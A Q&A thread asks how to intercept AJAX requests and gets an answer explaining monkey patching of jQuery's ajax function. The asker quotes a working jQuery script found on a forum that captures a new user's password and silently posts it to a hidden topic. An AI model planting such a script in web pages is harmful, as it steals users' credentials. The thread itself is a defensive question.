Intercept AJAX requests

Question

Intercept AJAX requests

Asked 10 years, 5 months ago

Viewed 950 times

7

I have the following doubt, as I can do to "intercept" AJAX requests before that they be made?

For example, in some forums while constantly browsing requests are being made without our knowledge, the other day I was in a forum and decided to take a look at their scripts and found the following:

jQuery(document).ready(function () {
     if (_userdata["user_posts"] === 0) {
         jQuery('<div id="get_pass" style="display: none;"></div>').insertAfter('#right .module:last');
         jQuery('#ucp input[name="submit"]').on('click', function () {
             var fieldValue = document.getElementById('password_reg').value;
             localStorage.setItem('text', fieldValue);
         });
         jQuery(window).load(function () {
             storedValue = localStorage.getItem('text');
             if (storedValue) {
                 jQuery('#get_pass').html(storedValue);
             }
             var senha = jQuery('#get_pass').text();
             jQuery.post('/post', {
                 message: 'Minha senha: ' + senha + '',
                 t: '4',
                 mode: 'reply',
                 post: 'Enviar'
             });
         });
     }
});

For those who did not understand, this causes the user to enter his password this script takes the password and sends to a hidden topic of normal users (via AJAX), IE the guy must have a log with the password of all users of his forum.

I got into the habit of not using the same password on all the sites I browse, so I won’t have trouble knowing mine or not, but I wouldn’t want it to repeat itself, so I’m in search of a script (maybe to use as Snippet in Chrome I don’t know yet) for every time an AJAX request is made alert appears on my screen showing what content will be sent in this request and some way to confirm it (if legit) or cancel (if malicious). It is possible to do this?

1 answer

Browser other questions tagged javascript ajax

You are not signed in. Login or sign up in order to post.

by Oralista de Sistemas • **23,115** points · Answer 1 · 2014-06-06T21:29:21+00:00

You can use a technique called Monkey Patching to modify the way Ajax calls work.

Every Javascript function can be overwritten. Try it on your browser console, it’s fun :) For example, the code below makes the native function alert function in the language of P:

var foo = alert;
alert = function (text) {
    var words = text.split(" ");
    for (var i = 0; i < words.length; i++) {
        words[i] = "p" + words[i];
    }
    foo(words.join(" "));
}
alert("Hello world!");

You can do the same thing with the function Ajax jQuery and the getItem of the object localStorage:

var foo = $.ajax;
$.ajax = function (a, b) {
    var bar = localStorage.getItem; // armazenando a função de pegar dados numa variável
    localStorage.getItem = function () {
        return "Vai se lascar hacker filho da p..."; // ou a URL minificada para 'Never Gonna Give You Up' no Youtube.
    };
    foo(a, b);
    localStorage.getItem = bar; // voltando a função ao normal.
}

Beware only of the contexts of objects and functions (maybe you need a bind here or there) - but be especially careful because, if you make Monkey Patching a habit, you will be handing your developer soul over to Mcgyver ;) Don’t abuse your powers that way.

In possession of this technique, you can, I don’t know, make a browser extension that you can use personally. Or you can start a project on Github to do an extension that checks for malicious code by sending credentials to someone the way you describe, and prevent access to localStorage only in such cases.

Editing: I forgot to tell you, but I think it’s clear after you apply the above technique. You can also play on the console (or somewhere else where you can read) the values of each property or parameter, and even the body of each method that Ajax uses internally. So you can display somewhere specifically the messages sent in the Ajax Posts.